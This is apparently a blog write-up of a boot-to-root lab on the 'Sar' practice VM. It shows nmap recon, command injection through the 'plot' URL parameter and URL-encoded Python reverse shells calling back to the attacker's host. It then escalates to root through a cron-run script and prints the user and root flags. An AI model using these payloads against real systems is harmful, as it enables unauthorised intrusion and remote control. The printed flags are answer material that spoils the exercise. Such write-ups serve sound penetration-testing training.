Take down “sar” machine


Target Machine IP Address:  
My Machine IP Address:


Boot to Root
1. To get user flag
2. To get root flag
3. To get root access


Sar is an OSCP-Like VM with the intent of gaining experience in the world of penetration testing.



You can download the machine from here.


To capture the target IP address:

sudo arp-scan --interface=vboxnet0
__$ sudo arp-scan --interface=vboxnet0 
[sudo] password for researcher: 
Interface: vboxnet0, type: EN10MB, MAC: 0a:00:27:00:00:00, IPv4:
WARNING: host part of is non-zero
Starting arp-scan 1.9.7 with 256 hosts (https://github.com/royhills/arp-scan) 08:00:27:72:a6:c8 PCS Systemtechnik GmbH 08:00:27:e7:60:30 PCS Systemtechnik GmbH

2 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.9.7: 256 hosts scanned in 2.030 seconds (126.11 hosts/sec). 2 responded

Target IP:

__$ nmap -sC -sV -p- -Pn -o nmap.log 
Host discovery disabled (-Pn). All addresses will be marked 'up' and scan times will be slower.
Starting Nmap 7.91 ( https://nmap.org ) at 2021-05-29 23:23 IST
Nmap scan report for
Host is up (0.0024s latency).
Not shown: 65534 closed ports
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.80 seconds



In web application you will see index.php?plot url extension.

http://<ipaddr>/index.php?plot=;<command-here> will execute 
the command you entered. After command injection press "select # host" then your command's 
output will appear bottom side of the scroll screen.;cat%20/etc/passwd

Since we can execute code, we will try to get a reverse connection…

On Browser:;python3%20-c%20%27import%20socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((%22192.168.56.1%22,1234));os.dup2(s.fileno(),0);%20os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27

On Kali Linux Machine:

nc -lvp 1234

cd /home/love/Desktop;cat user.txt

user flag:  427a7e47deb4a8649c7cab38df232b52

python3 -c "import pty;pty.spawn('/bin/bash')";
export TERM=xterm

It is a religious stuff that I upload linpeas.sh to /tmp folder of victim machine, through which I will come to know about the privilege escalation and get the root access and root flag.

Our of so many information we got, /var/spool/cron/crontab looks very promising. let’s check the crontab entry …

1. crontab -l   #no entry 
2. cat /etc/crontab

*/5 * * * * root cd /var/www/html/ && sudo ./finally.sh
www-data@sar:/var/www/html$ cat finally.sh
cat finally.sh
cd /var/www/html 
ls -lah
cat write.sh
touch /tmp/gateway   #we need to add a reverse shell here
Python Reverse Shell
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("",9000));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/bash")'

Subsequently, we shall wait a reverse connection on Kali Linux with port 9000

On Kali Linux:

nc -lvp 9000

root flag: 66f93d6b2ca96c9ad78a8a9ba0008e99


Leave a Reply

Your email address will not be published. Required fields are marked *

Fill out this field
Fill out this field
Please enter a valid email address.
You need to agree with the terms to proceed